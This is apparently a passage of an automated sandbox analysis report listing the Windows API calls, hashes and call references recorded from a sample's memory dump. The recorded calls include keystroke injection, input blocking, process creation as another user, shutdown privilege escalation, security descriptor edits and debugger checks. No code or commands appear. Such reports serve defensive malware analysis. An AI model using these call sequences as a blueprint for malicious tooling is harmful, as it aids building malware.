                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: _free
                                                                            • String ID:
                                                                            • API String ID: 269201875-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID:
                                                                            • API String ID: 4104443479-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: __wsplitpath
                                                                            • String ID:
                                                                            • API String ID: 3929583758-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID:
                                                                            • API String ID: 4104443479-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID:
                                                                            • API String ID: 4104443479-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SetFilePointerEx.KERNELBASE(?,?,00002000,00000000,?,?,00002000), ref: 0083E248
                                                                            Similarity
                                                                            • API ID: FilePointer
                                                                            • String ID:
                                                                            • API String ID: 973152223-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: ResumeThread
                                                                            • String ID:
                                                                            • API String ID: 947044025-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID:
                                                                            • API String ID: 4104443479-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • IsWindow.USER32(00000000), ref: 0089F386
                                                                              • Part of subcall function 0086198A: _memmove.LIBCMT ref: 008619CA
                                                                            Similarity
                                                                            • API ID: Window_memmove
                                                                            • String ID:
                                                                            • API String ID: 517827167-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetShortPathNameW.KERNELBASE ref: 0088CA1A
                                                                              • Part of subcall function 0083F220: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\33920049\fmkkelc.omp,0083F1F5,C:\Users\user\33920049\fmkkelc.omp,008D90E8,C:\Users\user\33920049\fmkkelc.omp,?,0083F1F5,?,?,00000001), ref: 0083F23C
                                                                            Similarity
                                                                            • API ID: NamePath$FullShort
                                                                            • String ID:
                                                                            • API String ID: 4229621559-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 008414F7: _malloc.LIBCMT ref: 00841511
                                                                              • Part of subcall function 0083F220: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\33920049\fmkkelc.omp,0083F1F5,C:\Users\user\33920049\fmkkelc.omp,008D90E8,C:\Users\user\33920049\fmkkelc.omp,?,0083F1F5,?,?,00000001), ref: 0083F23C
                                                                            • GetPrivateProfileStringW.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0088E501
                                                                            Similarity
                                                                            • API ID: FullNamePathPrivateProfileString_malloc
                                                                            • String ID:
                                                                            • API String ID: 3364953200-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(00000008,008412DC,00000000,?,00846A7F,?,008412DC,00000000,00000000,00000000,?,0084793E,00000001,00000214,?,008412DC), ref: 0084F5DA
                                                                              • Part of subcall function 00847E9A: __getptd_noexit.LIBCMT ref: 00847E9A
                                                                            Similarity
                                                                            • API ID: AllocateHeap__getptd_noexit
                                                                            • String ID:
                                                                            • API String ID: 328603210-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • ReadFile.KERNELBASE(00000000,?,00010000,?,00000000,?,?), ref: 00833B92
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID:
                                                                            • API String ID: 4104443479-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 008414F7: _malloc.LIBCMT ref: 00841511
                                                                            • _memmove.LIBCMT ref: 0087C17E
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: _malloc_memmove
                                                                            • String ID:
                                                                            • API String ID: 1183979061-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: __lock_file
                                                                            • String ID:
                                                                            • API String ID: 3031932315-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: _wcscpy
                                                                            • String ID:
                                                                            • API String ID: 3048848545-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 008414F7: _malloc.LIBCMT ref: 00841511
                                                                              • Part of subcall function 008414F7: std::exception::exception.LIBCMT ref: 00841546
                                                                              • Part of subcall function 008414F7: std::exception::exception.LIBCMT ref: 00841560
                                                                              • Part of subcall function 008414F7: __CxxThrowException@8.LIBCMT ref: 00841571
                                                                            • _memmove.LIBCMT ref: 0085A17D
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: std::exception::exception$Exception@8Throw_malloc_memmove
                                                                            • String ID:
                                                                            • API String ID: 620504543-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 008414F7: _malloc.LIBCMT ref: 00841511
                                                                              • Part of subcall function 008414F7: std::exception::exception.LIBCMT ref: 00841546
                                                                              • Part of subcall function 008414F7: std::exception::exception.LIBCMT ref: 00841560
                                                                              • Part of subcall function 008414F7: __CxxThrowException@8.LIBCMT ref: 00841571
                                                                            • _memmove.LIBCMT ref: 0085D363
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: std::exception::exception$Exception@8Throw_malloc_memmove
                                                                            • String ID:
                                                                            • API String ID: 620504543-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 008414F7: _malloc.LIBCMT ref: 00841511
                                                                            • CharUpperBuffW.USER32(?,?), ref: 0083ED03
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: BuffCharUpper_malloc
                                                                            • String ID:
                                                                            • API String ID: 1573836695-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • _wcslen.LIBCMT ref: 00873C38
                                                                              • Part of subcall function 00863D83: EnumProcesses.PSAPI(?,00000800,?,?,00873C4D,?,?,?,008D8178), ref: 00863DA0
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: EnumProcesses_wcslen
                                                                            • String ID:
                                                                            • API String ID: 3303492691-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 008414F7: _malloc.LIBCMT ref: 00841511
                                                                              • Part of subcall function 008414F7: std::exception::exception.LIBCMT ref: 00841546
                                                                              • Part of subcall function 008414F7: std::exception::exception.LIBCMT ref: 00841560
                                                                              • Part of subcall function 008414F7: __CxxThrowException@8.LIBCMT ref: 00841571
                                                                            • _memmove.LIBCMT ref: 0085877C
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: std::exception::exception$Exception@8Throw_malloc_memmove
                                                                            • String ID:
                                                                            • API String ID: 620504543-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • FindCloseChangeNotification.KERNELBASE(?,?,00856F2F), ref: 0083D9DD
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: ChangeCloseFindNotification
                                                                            • String ID:
                                                                            • API String ID: 2591292051-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,?,00000001,?,00002000), ref: 0083E288
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: FilePointer
                                                                            • String ID:
                                                                            • API String ID: 973152223-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(?), ref: 00863984
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: __wfsopen
                                                                            • String ID:
                                                                            • API String ID: 197181222-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SHGetFolderPathW.SHELL32(00000000,00000007,00000000,00000000,?), ref: 008A262C
                                                                            Similarity
                                                                            • API ID: FolderPath
                                                                            • String ID:
                                                                            • API String ID: 1514166925-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            APIs
                                                                            • GetForegroundWindow.USER32 ref: 00864407
                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0086442D
                                                                            • IsIconic.USER32 ref: 00864436
                                                                            • ShowWindow.USER32(?,00000009), ref: 00864443
                                                                            • SetForegroundWindow.USER32(?), ref: 00864451
                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00864468
                                                                            • GetCurrentThreadId.KERNEL32 ref: 0086446C
                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0086447A
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00864489
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0086448F
                                                                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 00864498
                                                                            • SetForegroundWindow.USER32(00000000), ref: 0086449E
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 008644AD
                                                                            • keybd_event.USER32 ref: 008644B6
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 008644C4
                                                                            • keybd_event.USER32 ref: 008644CD
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 008644DB
                                                                            • keybd_event.USER32 ref: 008644E4
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 008644F2
                                                                            • keybd_event.USER32 ref: 008644FB
                                                                            • SetForegroundWindow.USER32(00000000), ref: 00864505
                                                                            • AttachThreadInput.USER32(00000000,?,00000000), ref: 00864526
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 0086452C
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                            • String ID: Shell_TrayWnd
                                                                            • API String ID: 2889586943-2988720461
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00876294
                                                                            • CloseHandle.KERNEL32(?), ref: 008762A6
                                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 008762BE
                                                                            • GetProcessWindowStation.USER32 ref: 008762D7
                                                                            • SetProcessWindowStation.USER32(00000000), ref: 008762E1
                                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 008762FD
                                                                            • _wcslen.LIBCMT ref: 0087639E
                                                                              • Part of subcall function 008414F7: _malloc.LIBCMT ref: 00841511
                                                                            • _wcsncpy.LIBCMT ref: 008763C6
                                                                            • LoadUserProfileW.USERENV(?,00000020), ref: 008763DF
                                                                            • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 008763F9
                                                                            • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00876428
                                                                            • UnloadUserProfile.USERENV(?,?), ref: 0087645B
                                                                            • CloseWindowStation.USER32(00000000), ref: 00876472
                                                                            • CloseDesktop.USER32(?), ref: 00876480
                                                                            • SetProcessWindowStation.USER32(?), ref: 0087648E
                                                                            • CloseHandle.KERNEL32(?), ref: 00876498
                                                                            • DestroyEnvironmentBlock.USERENV(?), ref: 008764AF
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                                            • String ID: $default$winsta0
                                                                            • API String ID: 3324942560-1027155976
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 008633B3
                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 008633BA
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 008633CF
                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 008633F3
                                                                            • GetLastError.KERNEL32 ref: 008633F9
                                                                            • ExitWindowsEx.USER32(?,00000000), ref: 0086341C
                                                                            • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 0086344B
                                                                            • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 0086345E
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                            • String ID: SeShutdownPrivilege
                                                                            • API String ID: 2938487562-3733053543
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 00866DB5: GetUserObjectSecurity.USER32 ref: 00866DCF
                                                                              • Part of subcall function 00866DB5: GetLastError.KERNEL32(?,00000000,?), ref: 00866DD9
                                                                              • Part of subcall function 00866DB5: GetUserObjectSecurity.USER32 ref: 00866DFF
                                                                              • Part of subcall function 00866D81: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00866D9C
                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00876090
                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 008760C4
                                                                            • GetLengthSid.ADVAPI32(?), ref: 008760D6
                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 00876113
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0087612F
                                                                            • GetLengthSid.ADVAPI32(?), ref: 00876147
                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00876170
                                                                            • CopySid.ADVAPI32(00000000), ref: 00876177
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 008761A9
                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 008761CB
                                                                            • SetUserObjectSecurity.USER32 ref: 008761DE
                                                                            Similarity
                                                                            • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                            • String ID:
                                                                            • API String ID: 1255039815-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                            • String ID:
                                                                            • API String ID: 1737998785-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                            • String ID:
                                                                            • API String ID: 87235514-0
                                                                            • Opcode ID: cccefd997dee8e078eb2837649537b39b5943f5be989f7d0c11a3d282942b4d7
                                                                            • Instruction ID: dbf4c5c427b801e0b0650b5dcc583f5d57d0c01e24611fd99492cddbadea7de4
                                                                            • Opcode Fuzzy Hash: cccefd997dee8e078eb2837649537b39b5943f5be989f7d0c11a3d282942b4d7
                                                                            • Instruction Fuzzy Hash: 9B51F5A05057D539F73282788845FB6BFA8BF06300F08D689F1DD955C7C3A8E894D765
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • OleInitialize.OLE32(00000000), ref: 0089C0DC
                                                                            • _wcslen.LIBCMT ref: 0089C0EE
                                                                            • CreateBindCtx.OLE32(00000000,?), ref: 0089C198
                                                                            • MkParseDisplayName.OLE32(?,?,?,?), ref: 0089C1DE
                                                                              • Part of subcall function 00881AB8: GetLastError.KERNEL32(?,?,00000000), ref: 00881B16
                                                                              • Part of subcall function 00881AB8: VariantCopy.OLEAUT32(?,?), ref: 00881B6E
                                                                              • Part of subcall function 00881AB8: VariantCopy.OLEAUT32(-00000068,?), ref: 00881B84
                                                                              • Part of subcall function 00881AB8: VariantCopy.OLEAUT32(-00000088,?), ref: 00881B9D
                                                                              • Part of subcall function 00881AB8: VariantClear.OLEAUT32(-00000058), ref: 00881C17
                                                                            • CLSIDFromProgID.OLE32(00000000,?,?), ref: 0089C284
                                                                            • GetActiveObject.OLEAUT32(?,00000000,?), ref: 0089C29E
                                                                            Similarity
                                                                            • API ID: Variant$Copy$ActiveBindClearCreateDisplayErrorFromInitializeLastNameObjectParseProg_wcslen
                                                                            • String ID:
                                                                            • API String ID: 2728119192-0
                                                                            • Opcode ID: 43522f815b2611d68807f49ccb2b0fb3ba2edced60677a2598db8215e283056f
                                                                            • Instruction ID: 4f3fe387a60b4953344f20222a72d75a7e20adeaa18a100e6c9ed76d6492c330
                                                                            • Opcode Fuzzy Hash: 43522f815b2611d68807f49ccb2b0fb3ba2edced60677a2598db8215e283056f
                                                                            • Instruction Fuzzy Hash: 0D814971618305ABDB04EBA8CC81F9BB3A8FF88704F144919F645D7291EB71E905CBA6
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 00831D10: _wcslen.LIBCMT ref: 00831D11
                                                                              • Part of subcall function 00831D10: _memmove.LIBCMT ref: 00831D57
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00882455
                                                                            • Sleep.KERNEL32(0000000A), ref: 00882481
                                                                            • FindNextFileW.KERNEL32(?,?), ref: 0088255F
                                                                            • FindClose.KERNEL32(?), ref: 00882575
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                                            • String ID: *.*
                                                                            • API String ID: 2786137511-438819550
                                                                            • Opcode ID: d77ba936f5c1a081cb2d38ea65046d66a81c4c243dcf601f44b3c732134b8261
                                                                            • Instruction ID: e60742ba66f96e8f2f95967b1f3f979f2867d878b83c0562a3008d73bc01edf9
                                                                            • Opcode Fuzzy Hash: d77ba936f5c1a081cb2d38ea65046d66a81c4c243dcf601f44b3c732134b8261
                                                                            • Instruction Fuzzy Hash: 55417C71A402199FCF54EF68CC89AEEBBB4FF45300F14855AE818E7251D730AE45CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: __wcsicollmouse_event
                                                                            • String ID: DOWN
                                                                            • API String ID: 1033544147-711622031
                                                                            • Opcode ID: 1978310840041c2d602e18804b31a0d7366efc0c6b70e181c9f16841f3546aa6
                                                                            • Instruction ID: 12b4271ca257c7909f0a0ede9d42d3d644cb9853f03ae028282419e1a078f46a
                                                                            • Opcode Fuzzy Hash: 1978310840041c2d602e18804b31a0d7366efc0c6b70e181c9f16841f3546aa6
                                                                            • Instruction Fuzzy Hash: 64F0ED726887243AEC102A983C06EF7338CEB226A3F000151FE0CE2381E95A7D1646F6
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 00894E62: inet_addr.WSOCK32(?), ref: 00894E86
                                                                            • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 008A6629
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 008A664C
                                                                            Similarity
                                                                            • API ID: ErrorLastinet_addrsocket
                                                                            • String ID:
                                                                            • API String ID: 4170576061-0
                                                                            • Opcode ID: 77abc42a039a7be236d327306991bc6639050e415ab656d397e0ed5a1a8a2505
                                                                            • Instruction ID: 06d33e0351c28db586d8b29be6ea7838728137d51d2941afea458c7507561d3e
                                                                            • Opcode Fuzzy Hash: 77abc42a039a7be236d327306991bc6639050e415ab656d397e0ed5a1a8a2505
                                                                            • Instruction Fuzzy Hash: 3941B0326003006BE720AB6CEC86F5AB7E5FB84720F144655F944EB3C2DAB5A95187D6
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 0089F356: IsWindow.USER32(00000000), ref: 0089F386
                                                                            • IsWindowVisible.USER32 ref: 008AA322
                                                                            • IsWindowEnabled.USER32 ref: 008AA332
                                                                            • GetForegroundWindow.USER32(?,?,?,00000001), ref: 008AA33F
                                                                            • IsIconic.USER32 ref: 008AA34D
                                                                            • IsZoomed.USER32 ref: 008AA35B
                                                                            Similarity
                                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                            • String ID:
                                                                            • API String ID: 292994002-0
                                                                            • Opcode ID: 6516514c159dba3341c64b29fbb2e3f48f9b2e2206130d80a12f5a9fc9dbfcb9
                                                                            • Instruction ID: c2a0823844cc12f1c1a88a7e0858621ff127b494db3d0a2bbdbfe86c3b204635
                                                                            • Opcode Fuzzy Hash: 6516514c159dba3341c64b29fbb2e3f48f9b2e2206130d80a12f5a9fc9dbfcb9
                                                                            • Instruction Fuzzy Hash: E9117F327002115BFB20AB6ADC09B5FB7A8FF92711F148529E444D7A41DBB4EC41C7E2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • IsDebuggerPresent.KERNEL32 ref: 00851EE1
                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00851EF6
                                                                            • UnhandledExceptionFilter.KERNEL32(008B43DC), ref: 00851F01
                                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 00851F1D
                                                                            • TerminateProcess.KERNEL32(00000000), ref: 00851F24
                                                                            Similarity
                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                            • String ID:
                                                                            • API String ID: 2579439406-0
                                                                            • Opcode ID: 3722577c1de6daa2eedcb535f6832f58f1d62f096d928672b6de794275acef45
                                                                            • Instruction ID: b9c3123117a21807c20e2702682c9317d93bb164056c56b9bb99272ced958115
                                                                            • Opcode Fuzzy Hash: 3722577c1de6daa2eedcb535f6832f58f1d62f096d928672b6de794275acef45
                                                                            • Instruction Fuzzy Hash: 1521BBB9819204DFEB90DFA9FD49A447BB4FB08301F44025AFA0A8B771E7B56985CF05
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 00872654: _wcslen.LIBCMT ref: 00872680
                                                                            • CoInitialize.OLE32(00000000), ref: 0089E16E
                                                                            • CoCreateInstance.OLE32(008B2A08,00000000,00000001,008B28A8,?), ref: 0089E187
                                                                            • CoUninitialize.OLE32 ref: 0089E1A6
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                            • String ID: .lnk
                                                                            • API String ID: 886957087-24824748
                                                                            • Opcode ID: f917754ef58793c964fee5492073408435ead6d372fa9e170d62ab3734837c98
                                                                            • Instruction ID: 03ceb6657666f73876e92e29ebe0771c31bcab06ee43148d2a839cdfc869a2e8
                                                                            • Opcode Fuzzy Hash: f917754ef58793c964fee5492073408435ead6d372fa9e170d62ab3734837c98
                                                                            • Instruction Fuzzy Hash: 81A14975A042019FC714EF68D880A5BBBE9FF88710F188958F995DB351C731EC45CBA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID: U$\
                                                                            • API String ID: 4104443479-100911408
                                                                            • Opcode ID: 426575be84e7fd73ee258e7b76879596db8bf01f63505804d4d3425c554a9cd4
                                                                            • Instruction ID: be74631f5030e9c3fde4d97ac8f325c3ff3f8b6cc1960a60c754652d2f344da4
                                                                            • Opcode Fuzzy Hash: 426575be84e7fd73ee258e7b76879596db8bf01f63505804d4d3425c554a9cd4
                                                                            • Instruction Fuzzy Hash: F2029E70A042498FDB28CF69C4906BEBBF2FF85314F24C1ADD55AE724AD7349982CB51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 008722A5
                                                                            • InternetReadFile.WININET(?,00000000,?,?), ref: 008722DD
                                                                              • Part of subcall function 00872252: GetLastError.KERNEL32 ref: 00872268
                                                                            Similarity
                                                                            • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                            • String ID:
                                                                            • API String ID: 901099227-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • BlockInput.USER32(00000001), ref: 0088A378
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: BlockInput
                                                                            • String ID:
                                                                            • API String ID: 3456056419-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • DeleteObject.GDI32(?), ref: 00889528
                                                                            • DeleteObject.GDI32(?), ref: 0088953E
                                                                            • DestroyWindow.USER32(?), ref: 00889550
                                                                            • GetDesktopWindow.USER32 ref: 0088956E
                                                                            • GetWindowRect.USER32 ref: 00889575
                                                                            • SetRect.USER32 ref: 0088968B
                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00889699
                                                                            • CreateWindowExW.USER32 ref: 008896D5
                                                                            • GetClientRect.USER32 ref: 008896E5
                                                                            • CreateWindowExW.USER32 ref: 00889728
                                                                            • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0088974D
                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 00889768
                                                                            • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00889773
                                                                            • GlobalLock.KERNEL32 ref: 0088977C
                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0088978B
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00889792
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00889799
                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 008897A6
                                                                            • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,008B29F8,00000000), ref: 008897BD
                                                                            • GlobalFree.KERNEL32 ref: 008897CF
                                                                            • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 008897FB
                                                                            • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 0088981E
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00889844
                                                                            • ShowWindow.USER32(?,00000004), ref: 00889852
                                                                            • CreateWindowExW.USER32 ref: 0088989C
                                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 008898B0
                                                                            • GetStockObject.GDI32(00000011), ref: 008898BA
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 008898C2
                                                                            • GetTextFaceW.GDI32(00000000,00000040,?), ref: 008898D2
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008898DB
                                                                            • DeleteDC.GDI32(00000000), ref: 008898E5
                                                                            • _wcslen.LIBCMT ref: 00889903
                                                                            • _wcscpy.LIBCMT ref: 00889927
